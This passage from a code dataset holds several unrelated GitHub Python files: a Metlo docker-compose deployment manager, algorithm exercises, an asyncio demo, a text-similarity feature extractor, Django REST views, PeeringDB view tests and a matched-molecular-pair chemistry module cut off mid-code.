\"down\"], cwd=METLO_DIR)\n\n\ndef restart():\n subprocess.run([\"docker-compose\", \"restart\"], cwd=METLO_DIR)\n\n\ndef status():\n subprocess.run([\"docker-compose\", \"ps\"], cwd=METLO_DIR)\n\n\ndef update():\n pull_dockers()\n stop()\n update_files()\n start()\n prune_docker()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(dest=\"command\")\n\n init_cmd = subparsers.add_parser(\"init\")\n init_cmd.add_argument(\n \"-q\", \"--quiet\", help=\"Do not prompt for license key\", action=\"store_true\"\n )\n init_env_cmd = subparsers.add_parser(\"init-env\")\n init_env_cmd.add_argument(\n \"-q\", \"--quiet\", help=\"Do not prompt for license key\", action=\"store_true\"\n )\n start_cmd = subparsers.add_parser(\"start\")\n stop_cmd = subparsers.add_parser(\"stop\")\n status_cmd = subparsers.add_parser(\"status\")\n 
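# remaining lifecycle verbs wrap the docker-compose equivalents defined above\n    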
restart_cmd = subparsers.add_parser(\"restart\")\n    update_cmd = subparsers.add_parser(\"update\")\n\n    args = parser.parse_args()\n\n    command = args.command\n    if command == \"init\":\n        init(args.quiet)\n    elif command == \"init-env\":\n        init_env(args.quiet)\n    elif command == \"start\":\n        start()\n    elif command == \"stop\":\n        stop()\n    elif command == \"restart\":\n        restart()\n    elif command == \"update\":\n        update()\n    elif command == \"status\":\n        status()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"metlo-labs/metlo-deploy","sub_path":"manage-deployment.py","file_name":"manage-deployment.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"}
{"seq_id":"21316739497","text":"# Given an integer array nums, find the length of the longest strictly increasing subsequence.\r\n# A subsequence is derived from the array by deleting some (or no) elements without changing the order of the remaining elements.\r\n# For example, [3, 6, 2, 7] is a subsequence of the array [0, 3, 1, 6, 2, 2, 7].\r\n\r\nclass Solution:\r\n    def lengthOfLIS(self, nums: list[int]) -> int:\r\n        n = len(nums)\r\n        f = [0]*n\r\n        for i in range(n):\r\n            for j in range(i):\r\n                if nums[j] < nums[i]:\r\n                    f[i] = max(f[i],f[j])\r\n            f[i] += 1\r\n        return max(f)\r\n\r\n    # @cache\r\n    # def dfs(i):\r\n    #     res = 0\r\n    #     for j in range(i):\r\n    #         if nums[j] < nums[i]:\r\n    #             res = max(res,dfs(j))\r\n    #     return res + 1\r\n    #\r\n    # return max(dfs(i) for i in range(n))","repo_name":"Ww0225/pythonTest","sub_path":"最长递增子序列.py","file_name":"最长递增子序列.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"37026592405","text":"import asyncio\n\nasync def task1():\n    print(\"Begin task1\")\n    print(\"Completed task1\")\n\nasync def task2():\n    print(\"Begin task2\")\n    await asyncio.sleep(4)\n    await task1()\n    print(\"Completed task2\")\n\nasync def task3():\n    print(\"Task3 begin\")\n    await asyncio.sleep(2)\n    print(\"Completed task3\")\n\nasync def main():\n    return await asyncio.gather(task2(),task3())\n\n\nif __name__==\"__main__\":\n    loop=asyncio.get_event_loop()\n    loop.run_until_complete(main())\n    loop.close()\n","repo_name":"babiswas2020/Blind-paractise","sub_path":"test55.py","file_name":"test55.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19685351446","text":"# Day 6 of the 2022 Advent of Code\n# Read input file\nwith open(\"../include/input6.inc\",\"r\") as data_file:\n    data_str = data_file.read().strip()\n\nmarker_buffer = []\nchar_count = 0\nstart_done = False\nfor character in data_str:\n    char_count+=1\n    # If character exists in buffer, it now starts after the existing character\n    if character in marker_buffer:\n        i = marker_buffer.index(character)\n        marker_buffer = marker_buffer[i+1:]\n    marker_buffer.append(character)\n    # First time it's 4 characters long\n    if len(marker_buffer)==4 and not start_done:\n        start_count = char_count\n        start_done = True\n    # First time it's 14 characters long\n    elif len(marker_buffer)==14:\n        message_count = char_count\n        break\n\nprint(\"Part1: %s\"%start_count)\nprint(\"Part2: %s\"%message_count)","repo_name":"jpribeir/AdventCalender2022","sub_path":"src/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"13946338601","text":"import csv\nimport os\nimport pandas as pd \nfrom dice_coeff import dice_recur\nfrom cosine import get_cosine\nfrom jaccard_sim import 
is_ci_token_stopword_set_match\nfrom fuzz_string_matching import get_string_similarity\nfrom rouge_score import calc_Rouge\nfrom sequence_matcher import similar \nfrom surface_features import get_surface_features\nfrom fmeasure import FMeasure\nfrom word2vec_similarity import word2vec_score\nfrom ner_overlap import get_NER_overlap_score\nfrom find_numbers import get_number_similarity\nfrom pmi import getsignificance\nfrom wordnet_similarity import get_wordnet_based_similarity\nfrom tfidf import tfidf_cosine\n#from mine_POS_pats import POSFeatures\n\n#path = \"/home/saurav/Documents/nlp_intern/scisumm-corpus-master/data/Development-Set-Apr8\"\n\ndef findFeature(i,j):\n dice_score = []\n cosine_score = []\n jaccard_score = []\n fuzzy_score = []\n sequence_matcher = []\n fmeasure = []\n word2vec_scores = []\n wordnet_score = []\n tfidf_cosine_score = []\n\n # find features\n dice_score.append(dice_recur(i,j))\n cosine_score.append(get_cosine(i,j))\n jaccard_score.append(is_ci_token_stopword_set_match(i,j))\n fuzzy_score.append(get_string_similarity(i,j))\n sequence_matcher.append(similar(i,j))\n # tf-idf cosine similarity\n tfidf_cosine_score.append(tfidf_cosine(i, j))\n rouge_score = calc_Rouge(i,j)\n surf_features = get_surface_features(i,j)\n fmeasure.append(FMeasure(j))\n #word2vec_scores.append(word2vec_score(i,j))\n ner_overlap_score = get_NER_overlap_score(i,j)\n num_overlap_score = get_number_similarity(i,j)\n # no of significant words + summation of significance values\n significant_score = getsignificance(j)\n # get best similarity between words based on wordnet\n wordnet_score.append(get_wordnet_based_similarity(i,j))\n \n\n features = tuple(dice_score) + tuple(cosine_score) + tuple(jaccard_score) + tuple(fuzzy_score) + tuple(sequence_matcher)+ tuple(tfidf_cosine_score) + rouge_score + tuple(fmeasure) + surf_features + tuple(wordnet_score) + ner_overlap_score + num_overlap_score + significant_score \n featureVector = {}\n\n cnt = -1\n for feature in features:\n cnt +=1 \n featureVector[cnt] = feature\n\n return featureVector\n\n \nfeatureSets = []\n'''\nfor folder in os.listdir(path):\n if os.path.isdir(os.path.join(path, folder)):\n csv_file = os.path.join(path, folder)+\".csv\"\n csv_file = csv_file.replace('\\\\','/')\n print(\"processing: \", csv_file)\n \n dataframe = pd.read_csv(csv_file, header = None, delimiter = \"\\t\")\n a = dataframe[0]\n b = dataframe[1]\n label = dataframe[2]\n\n feature = [(findFeature(x,y),labels) for x,y,labels in zip(a,b,label)]\n #tfidf = str(tfidf_cosine(a, b))\n featureSets = featureSets + feature\n \nprint(len(featureSets))\nprint(featureSets[1])\n'''\npath = \"/home/saurav/Documents/nlp_intern/scisumm-corpus-master/data/Test-Set-2016\"\n\nfor folder in os.listdir(path):\n if os.path.isdir(os.path.join(path, folder)):\n csv_file = os.path.join(path, folder)+\".csv\"\n csv_file = csv_file.replace('\\\\','/')\n print(\"processing: \", csv_file)\n \n dataframe = pd.read_csv(csv_file, header = None, delimiter = \"\\t\")\n a = dataframe[0]\n b = dataframe[1]\n label = dataframe[2]\n\n feature = [(findFeature(x,y),labels) for x,y,labels in zip(a,b,label)]\n #tfidf = str(tfidf_cosine(a, b))\n featureSets = featureSets + feature\n\n# writing features to csv file\nwith open(\"test_no_Word2Vec_features.csv\", \"a\", newline=\"\") as f:\n cw = csv.writer(f)\n cw.writerows([v for _,v in sorted(d.items())] + [s] for d,s in featureSets)\n\n\n\n 
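\n# A minimal, hedged smoke test for findFeature (assumes the sibling feature\n# modules imported above are available on the path); the sentence pair below\n# is purely illustrative and not part of the original pipeline.\nif __name__ == '__main__':\n    demo = findFeature('the model is trained on treebank data',\n                       'we train our model on treebank data')\n    print('number of features per pair:', len(demo))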
\n\n","repo_name":"srvCodes/Reference-Scope-Identification-for-Citances-Using-CNN","sub_path":"get_features.py","file_name":"get_features.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75041758247","text":"# -*- coding: utf-8 -*-\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView\nfrom nt_core.exceptions import RsError\n\nfrom nt_app.models import CatResource\nfrom nt_app.serializers import (\n CatResourceCreateSerializer,\n CatResourceListSerializer\n)\n\n\nclass CatResourceView(APIView):\n def post(self, request):\n req_data = request.data\n validate_param = CatResourceCreateSerializer(data=req_data)\n validate_param.is_valid(raise_exception=True)\n data = validate_param.validated_data\n\n cat_obj = CatResource.objects.create(\n **data\n )\n\n return Response({\n 'id': cat_obj.id\n })\n\n def get(self, request):\n req_data = request.GET\n _id = req_data.get('id')\n if not _id:\n raise RsError('id不可缺少')\n\n cat_obj = CatResource.objects.filter(\n id=_id\n ).first()\n if not cat_obj:\n raise RsError('数据不存在')\n ser_data = CatResourceListSerializer(cat_obj).data\n return Response(ser_data)\n\n def put(self, request):\n req_data = request.data\n _id = req_data.get('id')\n if not _id:\n raise RsError('id不可缺少')\n\n cat_obj = CatResource.objects.filter(id=_id).first()\n if not cat_obj:\n raise RsError(\"id不存在\")\n\n ser = CatResourceListSerializer(cat_obj, req_data, partial=True)\n\n if ser.is_valid():\n ser.save()\n else:\n raise RsError(ser.errors)\n\n return Response({\"result\": True, \"id\": _id})\n\n def delete(self, request):\n req_data = request.data\n delete_ids = req_data.get('delete_ids')\n rows = CatResource.objects.filter(\n id__in=delete_ids\n ).delete()\n return Response({\"result\": True, \"rows\": rows})\n\n\nclass CatResourceListView(ListAPIView):\n cat_search_fields = [\n 'appid', 'id', 'response_time', 'request_count',\n 'start_time', 'end_time', 'fail_count'\n ]\n\n serializer_class = CatResourceListSerializer\n\n def list(self, request, *args, **kwargs):\n filters = self.generate_filter(request)\n cat_lists = CatResource.objects.filter(**filters).order_by('-update_time')\n page_data = self.paginate_queryset(cat_lists)\n serializer = self.serializer_class(page_data, many=True)\n\n return self.get_paginated_response(serializer.data)\n\n def generate_filter(self, request):\n req_data = request.GET\n filters = {}\n for filed in self.cat_search_fields:\n field_val = req_data.get(filed)\n if field_val:\n if filed in ['id', 'appid']:\n filters[filed] = field_val\n elif filed in ['start_time']:\n filters['create_time__gt'] = field_val\n elif filed in ['end_time']:\n filters['end_time__lt'] = field_val\n elif filed in ['response_time', 'request_count', 'fail_count']:\n filters['{}__gte'.format(filed)] = field_val\n filters['{}__lte'.format(filed)] = field_val\n\n return filters\n","repo_name":"harvardfly/network_anomaly_detection","sub_path":"nt_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"12895272272","text":"import json\nimport uuid\n\nimport pytest\nfrom django.conf import settings\nfrom django.contrib.auth import get_user\nfrom django.contrib.auth.models import AnonymousUser, Group\nfrom django.test import Client, RequestFactory, TestCase\nfrom 
django_grainy.models import GroupPermission, UserPermission\n\nimport peeringdb_server.models as models\nimport peeringdb_server.views as views\n\nfrom .util import ClientCase\n\n\nclass ViewTestCase(ClientCase):\n entities = [\"ix\", \"net\", \"fac\", \"carrier\", \"campus\"]\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n # create test users\n for name in [\n \"org_admin\",\n \"user_a\",\n \"user_b\",\n \"user_c\",\n \"user_d\",\n \"user_e\",\n \"user_f\",\n ]:\n setattr(\n cls,\n name,\n models.User.objects.create_user(name, \"%s@localhost\" % name, name),\n )\n getattr(cls, name).set_password(name)\n cls.user_group.user_set.add(getattr(cls, name))\n\n # create test org\n cls.org = models.Organization.objects.create(name=\"Test org\", status=\"ok\")\n cls.org_other = models.Organization.objects.create(\n name=\"Test org other\", status=\"ok\"\n )\n\n # create test entities\n for tag in cls.entities:\n kwargs = {\"name\": \"Test %s\" % tag, \"status\": \"ok\", \"org\": cls.org}\n if tag == \"net\":\n kwargs.update(asn=1)\n setattr(cls, tag, models.REFTAG_MAP[tag].objects.create(**kwargs))\n\n # add org_admin user to org as admin\n cls.org.admin_usergroup.user_set.add(cls.org_admin)\n\n # add user_a user to org as member\n cls.org.usergroup.user_set.add(cls.user_a)\n cls.org_other.usergroup.user_set.add(cls.user_b)\n\n def setUp(self):\n self.factory = RequestFactory()\n\n def run_view_test(self, reftag):\n id = getattr(self, reftag).id\n # test #1 - not logged in\n c = Client()\n resp = c.get(\"/%s/%d\" % (reftag, id), follow=True)\n self.assertEqual(resp.status_code, 200)\n\n # test #2 - guest logged in (not affiliated to any org)\n c = Client()\n c.login(username=\"guest\", password=\"guest\")\n resp = c.get(\"/%s/%d\" % (reftag, id), follow=True)\n self.assertEqual(resp.status_code, 200)\n\n # test #3 - user logged in\n c = Client()\n c.login(username=\"user_a\", password=\"user_a\")\n resp = c.get(\"/%s/%d\" % (reftag, id), follow=True)\n self.assertEqual(resp.status_code, 200)\n\n\nclass TestExchangeView(ViewTestCase):\n def test_view(self):\n self.run_view_test(\"ix\")\n\n\nclass TestFacilityView(ViewTestCase):\n def test_view(self):\n self.run_view_test(\"fac\")\n\n\nclass TestCarrieriew(ViewTestCase):\n def test_view(self):\n self.run_view_test(\"carrier\")\n\n\nclass TestCampusView(ViewTestCase):\n def test_view(self):\n self.run_view_test(\"campus\")\n\n\nclass TestOrgView(ViewTestCase):\n def test_view(self):\n self.run_view_test(\"org\")\n\n\nclass TestNetworkView(ViewTestCase):\n @classmethod\n def setUpTestData(cls):\n ViewTestCase.setUpTestData()\n # Create PoCs\n models.NetworkContact.objects.create(\n network=cls.net,\n visible=\"Users\",\n name=\"Contact Users\",\n phone=\"12345\",\n email=\"a@a.a\",\n status=\"ok\",\n )\n models.NetworkContact.objects.create(\n network=cls.net,\n visible=\"Public\",\n name=\"Contact Public\",\n phone=\"12345\",\n email=\"a@a.a\",\n status=\"ok\",\n )\n models.NetworkContact.objects.create(\n network=cls.net,\n visible=\"Private\",\n name=\"Contact Private\",\n phone=\"12345\",\n email=\"a@a.a\",\n status=\"ok\",\n )\n\n def test_view(self):\n self.run_view_test(\"net\")\n\n def test_poc_notify(self):\n \"\"\"\n Test that viewers are notified if PoCs are hidden from them\n \"\"\"\n\n TEXT_NOT_LOGGED_IN = \"Some of this network's contacts are hidden because they are only visible to authenticated users and you are currently not logged in.\"\n TEXT_NOT_VERIFIED = \"Some of this network's contacts are hidden because 
your user account is not affiliated with any organization.\"\n\n self.assertEqual(models.NetworkContact.objects.all().count(), 3)\n\n # test #1 - not logged in\n c = Client()\n resp = c.get(\"/net/%d\" % self.net.id, follow=True)\n content = resp.content.decode(\"utf-8\")\n self.assertEqual(resp.status_code, 200)\n assert resp.status_code == 200\n assert TEXT_NOT_LOGGED_IN in content\n assert \"Contact Public\" in content\n assert \"Contact Private\" not in content\n assert \"Contact Users\" not in content\n\n # test #2 - guest logged in (not affiliated to any org)\n c = Client()\n c.login(username=\"guest\", password=\"guest\")\n resp = c.get(\"/net/%d\" % self.net.id)\n content = resp.content.decode(\"utf-8\")\n assert resp.status_code == 200\n assert TEXT_NOT_VERIFIED in content\n assert \"Contact Public\" in content\n assert \"Contact Private\" not in content\n assert \"Contact Users\" not in content\n\n # test #3 - user logged in\n c = Client()\n c.login(username=\"user_a\", password=\"user_a\")\n resp = c.get(\"/net/%d\" % self.net.id)\n content = resp.content.decode(\"utf-8\")\n assert resp.status_code == 200\n assert TEXT_NOT_LOGGED_IN not in content\n assert TEXT_NOT_VERIFIED not in content\n\n assert \"Contact Public\" in content\n assert \"Contact Private\" in content\n assert \"Contact Users\" in content\n\n def test_search_asn_redirect(self):\n \"\"\"\n When the user types AS*** or ASN*** and hits enter, if\n a result is found it should redirect directly to the result\n \"\"\"\n\n c = Client()\n\n for q in [\"as1\", \"asn1\", \"AS1\", \"ASN1\"]:\n resp = c.get(f\"/search?q={q}\", follow=True)\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.redirect_chain, [(f\"/net/{self.net.id}\", 302)])\n","repo_name":"peeringdb/peeringdb","sub_path":"tests/test_entity_view.py","file_name":"test_entity_view.py","file_ext":"py","file_size_in_byte":6298,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"21454123225","text":"from typing import List\n\nclass Solution:\n def intervalIntersection(self, firstList: List[List[int]], secondList: List[List[int]]) -> List[List[int]]:\n m, n = len(firstList), len(secondList)\n ans: List[List[int]] = []\n i, j = 0, 0\n while i < m and j < n:\n s = max(firstList[i][0], secondList[j][0])\n e = min(firstList[i][1], secondList[j][1])\n if s <= e:\n ans.append([s, e])\n if firstList[i][1] < secondList[j][1]:\n i += 1\n else:\n j += 1\n return ans","repo_name":"jerrt2003/leetcode-in-python","sub_path":"986_Interval_List_Intersections/layoff.py","file_name":"layoff.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9312146438","text":"import base64\nimport gzip\nimport json\nimport multiprocessing\nimport sys\nfrom array import array\nfrom typing import List, NamedTuple, Union, Optional, Tuple\n\ntry:\n from mmpdblib import commandline as mmp, command_support, dbutils, analysis_algorithms\nexcept ImportError:\n from mmpdblib import cli as mmp, dbutils, analysis_algorithms\n from mmpdblib.analysis_algorithms import get_transform_tool\nfrom mmpdblib.analysis_algorithms import TransformResult\nfrom mmpdblib.dbutils import open_database, DBFile\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nfrom rdkit.Chem.rdchem import Mol, RWMol, BondType, Atom, BondStereo, Bond, Conformer\nfrom rdkit.Geometry.rdGeometry import Point3D\n\nfrom ruse.rdkit.rdkit_utils import RDKitFormat\nfrom 
ruse.rdkit.mcs import mcs_with_constant_smiles, mcs_match_fragments\nfrom ruse.rdkit.rdkit_utils import encode_mol, rescale_bond_lengths\nfrom ruse.util.data_table import DataTable\n\n\nclass MmpTransformProduct(NamedTuple):\n \"\"\"\n Base class for transform identified by mmpdb\n\n Attributes:\n\n - from_smiles: smiles with mapped wildcard atoms encoding variable part of query\n\n - to_smiles: smiles with mapped wildcard atoms encoding variable part of product\n\n - query: :class:`rdkit.Chem.rdchem.Mol` molecule containing query molecule. Annotated with bonds broken and variable core\n\n - product: :class:`rdkit.Chem.rdchem.Mol` molecule containing product molecule. Annotated with bonds broken and variable core\n\n - reversed: set true if the transformation is reversed compared to the database rule\n\n - value: mean numeric difference observed for the transform\n\n - n_pairs: number of pair values that contribute to the mean difference\n\n - radius: radius of match between query and pairs in rule\n\n - rule_environment_id: mmpdb database id for rule\n\n - constant_smiles: smiles for conserved portion of rule\n\n \"\"\"\n from_smiles: str\n to_smiles: str\n query: Mol\n product: Mol\n reversed: bool\n value: float\n n_pairs: int\n radius: int\n rule_environment_id: int\n constant_smiles: str\n query_reference_missing: List[int]\n\n\nclass RadiusAndRuleGroup(NamedTuple):\n rule_env_id: int\n radius: int\n query: Mol\n product: Mol\n from_smiles: str\n to_smiles: str\n constant_smiles: str\n properties: List[float]\n query_reference_missing: List[int]\n\n def to_grid_row(self, molecules: bool = False, include_constant_smiles: bool = False,\n build_fingerprints: bool = False, reference_query: Mol = None) -> List:\n if molecules:\n values = [self.query, self.product, Chem.MolFromSmiles(self.from_smiles),\n Chem.MolFromSmiles(self.to_smiles), self.radius, self.rule_env_id]\n else:\n values = [encode_mol(RDKitFormat.sdf, self.query), encode_mol(RDKitFormat.sdf, self.product),\n self.from_smiles, self.to_smiles, self.radius, self.rule_env_id]\n values = values + self.properties\n if build_fingerprints and reference_query:\n values.append(build_fingerprint(reference_query, self.query, 'variable'))\n if include_constant_smiles:\n values.append(self.constant_smiles)\n if build_fingerprints and reference_query:\n values.append(build_fingerprint(reference_query, self.query))\n return values\n\n\nclass MmpProduct(NamedTuple):\n \"\"\"\n Class to store a query and product and associated transforms. 
There will be one transform for each property\n requested\n\n Attributes:\n\n - query: query molecule of :class:`rdkit.Chem.rdchem.Mol`\n\n - product: product molecule :class:`rdkit.Chem.rdchem.Mol`\n\n - transform_products: A list of :class:`MmpTransformProduct` containing query to product transforms\n\n \"\"\"\n query: Mol\n product: Mol\n transform_products: List[MmpTransformProduct]\n\n def group_by_rule_and_radius(self) -> List[RadiusAndRuleGroup]:\n pairs = list({(-tp.rule_environment_id if tp.reversed else tp.rule_environment_id, tp.radius)\n for tp in self.transform_products if tp})\n groups = []\n for rule_environment_id, radius in pairs:\n transform_product = None\n properties = []\n for tp in self.transform_products:\n if not tp:\n properties.append(None)\n continue\n rule_env_id = -tp.rule_environment_id if tp.reversed else tp.rule_environment_id\n if rule_env_id == rule_environment_id and tp.radius == radius:\n if not transform_product:\n transform_product = tp\n else:\n assert tp.from_smiles == transform_product.from_smiles\n assert tp.to_smiles == transform_product.to_smiles\n properties.append(tp.value)\n else:\n properties.append(None)\n group = RadiusAndRuleGroup(rule_environment_id, radius, transform_product.query, transform_product.product,\n transform_product.from_smiles, transform_product.to_smiles,\n transform_product.constant_smiles, properties,\n transform_product.query_reference_missing)\n groups.append(group)\n return groups\n\n\nclass MmpTransform(NamedTuple):\n \"\"\"\n Class to store all transforms found for a query\n\n Attributes:\n\n - query: query molecule of :class:`rdkit.Chem.rdchem.Mol`\n\n - property_names: A list of the property names for which MMP deltas are requested\n\n - property_ids: MMPDB ids for the property names\n\n - products: List of products for the query as a list of :class:`MmpProduct` objects\n\n \"\"\"\n\n query: Mol\n property_names: List[str]\n property_ids: List[int]\n products: List[MmpProduct]\n\n def to_data_table(self, input_format: RDKitFormat, input_query: str,\n groups: Optional[List[RadiusAndRuleGroup]] = None) -> DataTable:\n \"\"\"\n Creates a ruse data table (:class:`ruse.util.data_table.DataTable`), with columns for query, product,\n property deltas, rule id and environment radius\n\n :return:\n \"\"\"\n\n if input_format == RDKitFormat.smi:\n query_property = input_query\n elif input_format == RDKitFormat.sdf:\n mol_gzip = gzip.compress(bytes(input_query, 'utf-8'))\n query_property = base64.b64encode(mol_gzip).decode('utf-8')\n else:\n raise ValueError('Unknown mmp query type {}'.format(input_format.name))\n\n columns = [DataTable.column_definition('Query', 'binary', 'chemical/x-mdl-molfile',\n properties={'mmpInputQuery': query_property}),\n DataTable.column_definition('Product', 'binary', 'chemical/x-mdl-molfile'),\n DataTable.column_definition('FROM', 'string', 'chemical/x-smiles'),\n DataTable.column_definition('TO', 'string', 'chemical/x-smiles'),\n DataTable.column_definition('RADIUS', 'int'),\n DataTable.column_definition('ENV_RULE', 'int')]\n\n for p in self.property_names:\n property_column = DataTable.column_definition(p, 'float', properties={'mmpPropertyColumn': 'true'})\n columns.append(property_column)\n\n columns.append(\n DataTable.column_definition('TransformFingerprint', 'binary', 'application/octet-stream'))\n columns.append(DataTable.column_definition('Fingerprint', 'binary', 'application/octet-stream'))\n\n rows = self.to_grid(build_fingerprints=True, groups=groups)\n data_table = 
DataTable(columns=columns, data=rows)\n return data_table\n\n def to_split_files(self, input_format: RDKitFormat, input_query: str):\n\n file_no = 0\n atom_ids_to_file = {}\n file_groups = {}\n rows = []\n\n for p in self.products:\n for group in p.group_by_rule_and_radius():\n query_ids = tuple(group.query_reference_missing)\n if query_ids in atom_ids_to_file:\n file = atom_ids_to_file[query_ids]\n else:\n file = \"mmp_data_table_{}.json\".format(file_no)\n file_no += 1\n atom_ids_to_file[query_ids] = file\n fingerprint = build_fingerprint_from_atoms(self.query, group.query_reference_missing)\n group_list = file_groups.setdefault(file, [])\n group_no = len(group_list)\n group_list.append(group)\n rows.append([file, group_no, fingerprint])\n\n file_data_tables = {file: self.to_data_table(input_format, input_query, groups=groups) for file, groups in\n file_groups.items()}\n for file, data_table in file_data_tables.items():\n with open(file, 'w', encoding='utf8') as fh:\n json.dump(data_table.to_data(), fh)\n\n columns = [DataTable.column_definition('File', 'string'),\n DataTable.column_definition('Row', 'int'),\n DataTable.column_definition('Fingerprint', 'binary', 'application/octet-stream')]\n data_table = DataTable(columns=columns, data=rows)\n return data_table\n\n def to_grid(self, molecules: bool = False, column_major: bool = False, include_constant_smiles: bool = False,\n build_fingerprints: bool = False, groups: Optional[List[RadiusAndRuleGroup]] = None) \\\n -> List[List[Union[str, int, float, Mol]]]:\n\n \"\"\"\n Converts the query and products to a matrix data structure, with columns for query, product,\n property deltas, rule id and environment radius. This can be used to build ruse or pandas\n data tables\n\n :param molecules: Set true to use RDKit molecules for cells containing structures\n :param column_major: Set true for column major indexing (default is row major)\n :return: matrix as list of lists\n \"\"\"\n\n if not groups:\n groups = [g for p in self.products for g in p.group_by_rule_and_radius()]\n rows = [g.to_grid_row(molecules, include_constant_smiles, build_fingerprints, self.query) for g in groups]\n\n return rows if not column_major else [list(c) for c in zip(*rows)]\n\n\ndef map_labelled_atoms_to_reference(reference: Mol, transform: Mol, atom_property: str = 'missing') -> \\\n List[int]:\n mapping = transform.GetSubstructMatch(reference)\n assert mapping\n transform_to_query = {i: m for m, i in enumerate(mapping)}\n labelled_transform_atoms = [atom.GetIdx() for atom in transform.GetAtoms()\n if atom.HasProp(atom_property) and atom.GetBoolProp(atom_property)]\n labelled_reference_atoms = [transform_to_query[t] for t in labelled_transform_atoms]\n for input_idx, transform_idx in zip(labelled_reference_atoms, labelled_transform_atoms):\n assert reference.GetAtomWithIdx(input_idx).GetAtomicNum() == \\\n transform.GetAtomWithIdx(transform_idx).GetAtomicNum()\n labelled_reference_atoms.sort()\n return labelled_reference_atoms\n\n\ndef build_fingerprint_from_atoms(reference_query: Mol, labelled_reference_atoms: List[int]) -> str:\n changed_input_bonds = [bond.GetIdx() for bond in reference_query.GetBonds()\n if bond.GetBeginAtomIdx() in labelled_reference_atoms\n and bond.GetEndAtomIdx() in labelled_reference_atoms]\n data = array('b')\n for i in range(reference_query.GetNumAtoms()):\n val = 0x1 if i in labelled_reference_atoms else 0\n data.append(val)\n for i in range(reference_query.GetNumBonds()):\n val = 0x1 if i in changed_input_bonds else 0\n data.append(val)\n 
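# gzip the per-atom/per-bond flag bytes and base64-encode them so the\n # fingerprint can be stored and exchanged as a plain string\n 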
compress_data = gzip.compress(data)\n encoded_data = base64.b64encode(compress_data).decode('utf-8')\n return encoded_data\n\n\ndef atoms_and_bonds_from_fingerprint(reference_query: Mol, fingerprint: str) -> Tuple[List[int], List[int]]:\n compress_data = base64.b64decode(fingerprint.encode('utf-8'))\n data = gzip.decompress(compress_data)\n n_atoms = reference_query.GetNumAtoms()\n assert (len(data) == n_atoms + reference_query.GetNumBonds())\n atoms = [i for i, v in enumerate(data) if i < n_atoms and v == 0x1]\n bonds = [i - n_atoms for i, v in enumerate(data) if i >= n_atoms and v == 0x1]\n return atoms, bonds\n\n\ndef build_fingerprint(reference_query: Mol, transform_query: Mol, atom_property: str = 'missing',\n ) -> str:\n labelled_reference_atoms = map_labelled_atoms_to_reference(reference_query, transform_query, atom_property)\n return build_fingerprint_from_atoms(reference_query, labelled_reference_atoms)\n\n\nclass MmpPair(NamedTuple):\n \"\"\"\n A pair from the MMPDB database\n\n Attributes:\n\n - from_id: database id of LHS of pair\n\n - from_smiles: structure of LHS\n\n - from_property: LHS property value\n\n - to_id: database id of RHS of pair\n\n - to_smiles: structure of RHS\n\n - to_property: RHS property value\n \"\"\"\n from_id: str\n from_smiles: str\n from_property: float\n to_id: str\n to_smiles: str\n to_property: float\n\n\nclass MmpEnvironment(NamedTuple):\n \"\"\"\n Base class to define the pairs for a property transform. This class is only used to validate the Ruse webservice\n\n Attributes:\n\n - pairs: a list of pairs used to define a transform\n \"\"\"\n pairs: List[MmpPair]\n\n def delta(self):\n \"\"\"\n Determines the overall property delta from the list of pairs\n\n :return: property difference from transform\n \"\"\"\n diffs = [p.to_property - p.from_property for p in self.pairs]\n mean = sum(diffs) / float(len(diffs))\n return mean\n\n def to_grid(self, molecules: bool = False):\n rows = []\n for p in self.pairs:\n if molecules:\n row = [p.from_id, Chem.MolFromSmiles(p.from_smiles), p.from_property,\n p.to_id, Chem.MolFromSmiles(p.to_smiles), p.to_property]\n else:\n row = [p.from_id, p.from_smiles, p.from_property,\n p.to_id, p.to_smiles, p.to_property]\n rows.append(row)\n return rows\n\n\ndef transform(smiles: str, properties: List[str], database_file: str) -> TransformResult:\n \"\"\"\n A rewrite of :func:`mmpdb.do_analysis.transform_command` to return in-memory transform results rather than\n print them out.\n\n :param smiles: input structure\n :param properties: properties to estimate effect on\n :param database_file: MMP database\n :return: result of the transform\n \"\"\"\n\n # MMPDB 2 stuff:\n try:\n args_in = ['transform', '--smiles', smiles, database_file]\n for p in properties:\n args_in.extend(['--property', p])\n args, _ = mmp.parser.parse_known_args(args_in)\n parser = args.subparser\n min_radius = args.min_radius\n assert min_radius in list(\"012345\"), min_radius\n min_radius = int(min_radius)\n min_pairs = int(args.min_pairs)\n min_variable_size = args.min_variable_size\n min_constant_size = args.min_constant_size\n explain = command_support.get_explain(args.explain)\n dataset = dbutils.open_dataset_from_args_or_exit(args)\n property_names = command_support.get_property_names_or_error(parser, args, dataset)\n\n if args.substructure:\n substructure_pat = Chem.MolFromSmarts(args.substructure)\n if substructure_pat is None:\n parser.error(\"Cannot parse --substructure %r\" % (args.substructure,))\n else:\n substructure_pat = None\n\n # evaluate 
